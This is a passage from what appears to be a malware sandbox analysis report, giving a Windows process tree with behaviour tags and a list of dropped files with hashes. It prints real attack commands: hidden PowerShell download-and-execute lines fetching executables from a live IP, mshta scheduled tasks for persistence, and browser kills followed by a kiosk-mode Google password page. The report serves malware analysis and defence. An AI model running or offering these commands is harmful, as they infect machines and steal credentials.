                                            • System Location Discovery: System Language Discovery
                                            • Checks processor information in registry
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:1988
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2648 -s 556
                                            4⤵
                                            • Loads dropped DLL
                                            • Program crash
                                            PID:292
                                        • C:\Users\Admin\AppData\Local\Temp\1086926001\3omTNLZ.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1086926001\3omTNLZ.exe"
                                          3⤵
                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                          • Checks BIOS information in registry
                                          • Executes dropped EXE
                                          • Identifies Wine through registry keys
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:2440
                                        • C:\Users\Admin\AppData\Local\Temp\1086927001\d2YQIJa.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1086927001\d2YQIJa.exe"
                                          3⤵
                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                          • Checks BIOS information in registry
                                          • Executes dropped EXE
                                          • Identifies Wine through registry keys
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:1600
                                        • C:\Users\Admin\AppData\Local\Temp\1086928001\Ta3ZyUR.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1086928001\Ta3ZyUR.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          • System Location Discovery: System Language Discovery
                                          PID:2676
                                          • C:\Users\Admin\AppData\Local\Temp\1086928001\Ta3ZyUR.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1086928001\Ta3ZyUR.exe"
                                            4⤵
                                            • Executes dropped EXE
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:2888
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2676 -s 560
                                            4⤵
                                            • Program crash
                                            PID:1580
                                        • C:\Users\Admin\AppData\Local\Temp\1086933101\dc86b89870.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1086933101\dc86b89870.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          • Suspicious use of FindShellTrayWindow
                                          • Suspicious use of SendNotifyMessage
                                          PID:2948
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c schtasks /create /tn DaBQlmaudvb /tr "mshta C:\Users\Admin\AppData\Local\Temp\EoWitZcJH.hta" /sc minute /mo 25 /ru "Admin" /f
                                            4⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:2336
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              schtasks /create /tn DaBQlmaudvb /tr "mshta C:\Users\Admin\AppData\Local\Temp\EoWitZcJH.hta" /sc minute /mo 25 /ru "Admin" /f
                                              5⤵
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:3032
                                          • C:\Windows\SysWOW64\mshta.exe
                                            mshta C:\Users\Admin\AppData\Local\Temp\EoWitZcJH.hta
                                            4⤵
                                            • Modifies Internet Explorer settings
                                            PID:2460
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'A7KHRJXYUE7ZDJOTW0YLTXZTZCNRETEP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
                                              5⤵
                                              • Blocklisted process makes network request
                                              • Command and Scripting Interpreter: PowerShell
                                              • Downloads MZ/PE file
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1960
                                              • C:\Users\Admin\AppData\Local\TempA7KHRJXYUE7ZDJOTW0YLTXZTZCNRETEP.EXE
                                                "C:\Users\Admin\AppData\Local\TempA7KHRJXYUE7ZDJOTW0YLTXZTZCNRETEP.EXE"
                                                6⤵
                                                • Modifies Windows Defender DisableAntiSpyware settings
                                                • Modifies Windows Defender Real-time Protection settings
                                                • Modifies Windows Defender TamperProtection settings
                                                • Modifies Windows Defender notification settings
                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                • Checks BIOS information in registry
                                                • Executes dropped EXE
                                                • Identifies Wine through registry keys
                                                • Windows security modification
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2488
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd /c ""C:\Users\Admin\AppData\Local\Temp\1086934021\am_no.cmd" "
                                          3⤵
                                            PID:2952
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1086934021\am_no.cmd" any_word
                                              4⤵
                                                PID:1352
                                                • C:\Windows\SysWOW64\timeout.exe
                                                  timeout /t 2
                                                  5⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Delays execution with timeout.exe
                                                  PID:2312
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                  5⤵
                                                    PID:2876
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                      6⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2152
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                    5⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:1324
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                      6⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2124
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                    5⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:1692
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                      6⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2060
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    schtasks /create /tn "OUmN9ma26lf" /tr "mshta \"C:\Temp\woGj13cqd.hta\"" /sc minute /mo 25 /ru "Admin" /f
                                                    5⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:1244
                                                  • C:\Windows\SysWOW64\mshta.exe
                                                    mshta "C:\Temp\woGj13cqd.hta"
                                                    5⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Modifies Internet Explorer settings
                                                    PID:2964
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                                      6⤵
                                                      • Blocklisted process makes network request
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Downloads MZ/PE file
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2820
                                                      • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                                        7⤵
                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                        • Checks BIOS information in registry
                                                        • Executes dropped EXE
                                                        • Identifies Wine through registry keys
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        PID:2172
                                              • C:\Users\Admin\AppData\Local\Temp\1086944001\2266dcdb00.exe
                                                "C:\Users\Admin\AppData\Local\Temp\1086944001\2266dcdb00.exe"
                                                3⤵
                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                • Checks BIOS information in registry
                                                • Executes dropped EXE
                                                • Identifies Wine through registry keys
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                • Suspicious use of SetThreadContext
                                                • System Location Discovery: System Language Discovery
                                                PID:1236
                                                • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                  "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                  4⤵
                                                  • Downloads MZ/PE file
                                                  PID:1556
                                              • C:\Users\Admin\AppData\Local\Temp\1086945001\4536f7f1c3.exe
                                                "C:\Users\Admin\AppData\Local\Temp\1086945001\4536f7f1c3.exe"
                                                3⤵
                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                • Checks BIOS information in registry
                                                • Executes dropped EXE
                                                • Identifies Wine through registry keys
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                • Suspicious use of SetThreadContext
                                                • System Location Discovery: System Language Discovery
                                                PID:3388
                                                • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                  "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                  4⤵
                                                  • Downloads MZ/PE file
                                                  • System Location Discovery: System Language Discovery
                                                  PID:4016
                                              • C:\Users\Admin\AppData\Local\Temp\1086946001\a1ba79af20.exe
                                                "C:\Users\Admin\AppData\Local\Temp\1086946001\a1ba79af20.exe"
                                                3⤵
                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                • Checks BIOS information in registry
                                                • Executes dropped EXE
                                                • Identifies Wine through registry keys
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                • System Location Discovery: System Language Discovery
                                                PID:4020
                                              • C:\Users\Admin\AppData\Local\Temp\1086947001\4c71e9f822.exe
                                                "C:\Users\Admin\AppData\Local\Temp\1086947001\4c71e9f822.exe"
                                                3⤵
                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                • Checks BIOS information in registry
                                                • Executes dropped EXE
                                                • Identifies Wine through registry keys
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:936
                                              • C:\Users\Admin\AppData\Local\Temp\1086948001\8f4c900399.exe
                                                "C:\Users\Admin\AppData\Local\Temp\1086948001\8f4c900399.exe"
                                                3⤵
                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                • Checks BIOS information in registry
                                                • Executes dropped EXE
                                                • Identifies Wine through registry keys
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                • System Location Discovery: System Language Discovery
                                                • Checks processor information in registry
                                                PID:3748
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3748 -s 804
                                                  4⤵
                                                  • Program crash
                                                  PID:3388
                                              • C:\Users\Admin\AppData\Local\Temp\1086949001\3e5895c6d6.exe
                                                "C:\Users\Admin\AppData\Local\Temp\1086949001\3e5895c6d6.exe"
                                                3⤵
                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                • Checks BIOS information in registry
                                                • Executes dropped EXE
                                                • Identifies Wine through registry keys
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                • System Location Discovery: System Language Discovery
                                                PID:3960
                                              • C:\Users\Admin\AppData\Local\Temp\1086950001\dd0f37a968.exe
                                                "C:\Users\Admin\AppData\Local\Temp\1086950001\dd0f37a968.exe"
                                                3⤵
                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                • Checks BIOS information in registry
                                                • Executes dropped EXE
                                                • Identifies Wine through registry keys
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                • System Location Discovery: System Language Discovery
                                                PID:2336
                                              • C:\Users\Admin\AppData\Local\Temp\1086951001\b463df2a29.exe
                                                "C:\Users\Admin\AppData\Local\Temp\1086951001\b463df2a29.exe"
                                                3⤵
                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                • Checks BIOS information in registry
                                                • Executes dropped EXE
                                                • Identifies Wine through registry keys
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                • System Location Discovery: System Language Discovery
                                                PID:3112
                                              • C:\Users\Admin\AppData\Local\Temp\1086952001\eaa92bd248.exe
                                                "C:\Users\Admin\AppData\Local\Temp\1086952001\eaa92bd248.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious use of FindShellTrayWindow
                                                • Suspicious use of SendNotifyMessage
                                                PID:2268
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /F /IM firefox.exe /T
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Kills process with taskkill
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:3960
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /F /IM chrome.exe /T
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Kills process with taskkill
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2460
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /F /IM msedge.exe /T
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Kills process with taskkill
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2612
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /F /IM opera.exe /T
                                                  4⤵
                                                  • Kills process with taskkill
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:820
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /F /IM brave.exe /T
                                                  4⤵
                                                  • Kills process with taskkill
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2740
                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                  4⤵
                                                    PID:604
                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                      5⤵
                                                      • Checks processor information in registry
                                                      • Modifies registry class
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      • Suspicious use of SendNotifyMessage
                                                      PID:3092
                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3092.0.1000302032\854539148" -parentBuildID 20221007134813 -prefsHandle 1240 -prefMapHandle 1232 -prefsLen 21028 -prefMapSize 233548 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7a09593c-8c5c-4953-83ae-e7edc859b618} 3092 "\\.\pipe\gecko-crash-server-pipe.3092" 1304 145f6a58 gpu
                                                        6⤵
                                                          PID:3716
                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3092.1.1809374142\703616909" -parentBuildID 20221007134813 -prefsHandle 1492 -prefMapHandle 1488 -prefsLen 21889 -prefMapSize 233548 -appDir "C:\Program Files\Mozilla Firefox\browser" - {76983395-779f-4142-9146-c40c2386ae72} 3092 "\\.\pipe\gecko-crash-server-pipe.3092" 1520 e72758 socket
                                                          6⤵
                                                            PID:3164
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3092.2.483492727\1102700262" -childID 1 -isForBrowser -prefsHandle 1820 -prefMapHandle 1720 -prefsLen 21992 -prefMapSize 233548 -jsInitHandle 808 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a3fe449f-b9a4-40f7-8afc-b8fa19768b3a} 3092 "\\.\pipe\gecko-crash-server-pipe.3092" 1684 1a8fcc58 tab
                                                            6⤵
                                                              PID:4028
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3092.3.276655168\546350959" -childID 2 -isForBrowser -prefsHandle 2592 -prefMapHandle 2588 -prefsLen 26340 -prefMapSize 233548 -jsInitHandle 808 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ac6d6ce5-f144-4da0-832a-3fabf4fd49dc} 3092 "\\.\pipe\gecko-crash-server-pipe.3092" 2604 e64b58 tab
                                                              6⤵
                                                                PID:3744
                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3092.4.842921909\173296409" -childID 3 -isForBrowser -prefsHandle 3364 -prefMapHandle 3520 -prefsLen 26340 -prefMapSize 233548 -jsInitHandle 808 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {60eed950-bd31-4c5e-8df6-b8330446a0c9} 3092 "\\.\pipe\gecko-crash-server-pipe.3092" 3536 20b88158 tab
                                                                6⤵
                                                                  PID:1920
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3092.5.881231077\1009590943" -childID 4 -isForBrowser -prefsHandle 3652 -prefMapHandle 3656 -prefsLen 26340 -prefMapSize 233548 -jsInitHandle 808 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fe577ada-e306-4369-bd8c-4849c3dcccf5} 3092 "\\.\pipe\gecko-crash-server-pipe.3092" 3640 20b8a258 tab
                                                                  6⤵
                                                                    PID:1980
                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3092.6.127137462\1644947726" -childID 5 -isForBrowser -prefsHandle 3824 -prefMapHandle 3828 -prefsLen 26340 -prefMapSize 233548 -jsInitHandle 808 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a5215c6d-9b88-4937-b1ef-3f86d38fa3d2} 3092 "\\.\pipe\gecko-crash-server-pipe.3092" 3808 20b88458 tab
                                                                    6⤵
                                                                      PID:1996
                                                              • C:\Users\Admin\AppData\Local\Temp\1086953001\50f96f9f6a.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\1086953001\50f96f9f6a.exe"
                                                                3⤵
                                                                • Executes dropped EXE
                                                                • System Location Discovery: System Language Discovery
                                                                • Suspicious use of FindShellTrayWindow
                                                                • Suspicious use of SendNotifyMessage
                                                                PID:2140
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c schtasks /create /tn bvDFimasxCU /tr "mshta C:\Users\Admin\AppData\Local\Temp\M1KQZUaok.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                  4⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:2484
                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                    schtasks /create /tn bvDFimasxCU /tr "mshta C:\Users\Admin\AppData\Local\Temp\M1KQZUaok.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                    5⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    • Scheduled Task/Job: Scheduled Task
                                                                    PID:2996
                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                  mshta C:\Users\Admin\AppData\Local\Temp\M1KQZUaok.hta
                                                                  4⤵
                                                                  • Modifies Internet Explorer settings
                                                                  PID:3080
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'QJPENE5TXEJ5PUKIDGBVIYCZATRXK8PX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                                                    5⤵
                                                                    • Blocklisted process makes network request
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    • Downloads MZ/PE file
                                                                    • System Location Discovery: System Language Discovery
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2124
                                                                    • C:\Users\Admin\AppData\Local\TempQJPENE5TXEJ5PUKIDGBVIYCZATRXK8PX.EXE
                                                                      "C:\Users\Admin\AppData\Local\TempQJPENE5TXEJ5PUKIDGBVIYCZATRXK8PX.EXE"
                                                                      6⤵
                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                      • Checks BIOS information in registry
                                                                      • Executes dropped EXE
                                                                      • Identifies Wine through registry keys
                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                      PID:2640
                                                              • C:\Users\Admin\AppData\Local\Temp\1086954001\3b959cc017.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\1086954001\3b959cc017.exe"
                                                                3⤵
                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                • Checks BIOS information in registry
                                                                • Executes dropped EXE
                                                                • Identifies Wine through registry keys
                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                • Modifies system certificate store
                                                                PID:3960
                                                              • C:\Users\Admin\AppData\Local\Temp\1086955001\96cd7a6a36.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\1086955001\96cd7a6a36.exe"
                                                                3⤵
                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                • Checks BIOS information in registry
                                                                • Executes dropped EXE
                                                                • Identifies Wine through registry keys
                                                                • Writes to the Master Boot Record (MBR)
                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                PID:1800
                                                              • C:\Users\Admin\AppData\Local\Temp\1086956001\57eec1646c.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\1086956001\57eec1646c.exe"
                                                                3⤵
                                                                • Executes dropped EXE
                                                                • System Location Discovery: System Language Discovery
                                                                • Modifies system certificate store
                                                                PID:2132
                                                              • C:\Users\Admin\AppData\Local\Temp\1086957001\c5845c87f3.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\1086957001\c5845c87f3.exe"
                                                                3⤵
                                                                • Executes dropped EXE
                                                                • System Location Discovery: System Language Discovery
                                                                PID:2348
                                                          • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                                            "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                                            1⤵
                                                              PID:2156
                                                            • C:\Windows\system32\taskeng.exe
                                                              taskeng.exe {B9B6B855-43BC-4B1E-ABAE-FE65D6BC39A9} S-1-5-21-3290804112-2823094203-3137964600-1000:VORHPBAB\Admin:Interactive:[1]
                                                              1⤵
                                                                PID:2800
                                                                • C:\ProgramData\rjbr\bovjd.exe
                                                                  C:\ProgramData\rjbr\bovjd.exe start2
                                                                  2⤵
                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                  • Checks BIOS information in registry
                                                                  • Executes dropped EXE
                                                                  • Identifies Wine through registry keys
                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:1732
                                                                • C:\ProgramData\hsfrhep\gmsbuho.exe
                                                                  C:\ProgramData\hsfrhep\gmsbuho.exe start2
                                                                  2⤵
                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                  • Checks BIOS information in registry
                                                                  • Executes dropped EXE
                                                                  • Identifies Wine through registry keys
                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:2540
                                                                • C:\ProgramData\hsfrhep\gmsbuho.exe
                                                                  C:\ProgramData\hsfrhep\gmsbuho.exe start2
                                                                  2⤵
                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                  • Checks BIOS information in registry
                                                                  • Executes dropped EXE
                                                                  • Identifies Wine through registry keys
                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                  PID:1804

                                                              Network

                                                              MITRE ATT&CK Enterprise v15

                                                              Replay Monitor

                                                              Loading Replay Monitor...

                                                              Downloads

                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                Filesize

                                                                342B

                                                                MD5

                                                                0d7b0d5363dd2dbd02e7b9bae07ae1c3

                                                                SHA1

                                                                9f40a6c6728ff97ded6c63967d8c60789b90879f

                                                                SHA256

                                                                5edf98ba02d2dd25dadff5a8acb1cd2b250e6565f227448a04be4f8d8ca176b3

                                                                SHA512

                                                                fb9147eab321731ae65bc5fefda7871e4e8ef4bcda3afb61359a8ae57f5b0e0167847c8055d204b73f93f87a5d71c389ca226a235111274381fc2246e1062e34

                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\000007.dbtmp

                                                                Filesize

                                                                16B

                                                                MD5

                                                                18e723571b00fb1694a3bad6c78e4054

                                                                SHA1

                                                                afcc0ef32d46fe59e0483f9a3c891d3034d12f32

                                                                SHA256

                                                                8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa

                                                                SHA512

                                                                43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

                                                                Filesize

                                                                264KB

                                                                MD5

                                                                f50f89a0a91564d0b8a211f8921aa7de

                                                                SHA1

                                                                112403a17dd69d5b9018b8cede023cb3b54eab7d

                                                                SHA256

                                                                b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                                                                SHA512

                                                                bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EB0KZ1Y4\dll[1]

                                                                Filesize

                                                                236KB

                                                                MD5

                                                                2ecb51ab00c5f340380ecf849291dbcf

                                                                SHA1

                                                                1a4dffbce2a4ce65495ed79eab42a4da3b660931

                                                                SHA256

                                                                f1b3e0f2750a9103e46a6a4a34f1cf9d17779725f98042cc2475ec66484801cf

                                                                SHA512

                                                                e241a48eafcaf99187035f0870d24d74ae97fe84aaadd2591cceea9f64b8223d77cfb17a038a58eadd3b822c5201a6f7494f26eea6f77d95f77f6c668d088e6b

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EB0KZ1Y4\service[1].htm

                                                                Filesize

                                                                1B

                                                                MD5

                                                                cfcd208495d565ef66e7dff9f98764da

                                                                SHA1

                                                                b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                                                                SHA256

                                                                5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                                                                SHA512

                                                                31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZOGPI1N2\soft[1]

                                                                Filesize

                                                                987KB

                                                                MD5

                                                                f49d1aaae28b92052e997480c504aa3b

                                                                SHA1

                                                                a422f6403847405cee6068f3394bb151d8591fb5

                                                                SHA256

                                                                81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0

                                                                SHA512

                                                                41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773

                                                              • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4k8o8gx5.default-release\activity-stream.discovery_stream.json.tmp

                                                                Filesize

                                                                33KB

                                                                MD5

                                                                910f5d6b849eb02c835f3200a35c86d7

                                                                SHA1

                                                                a040849400713fe93c4f8b0ae2ec805ce53ee05c

                                                                SHA256

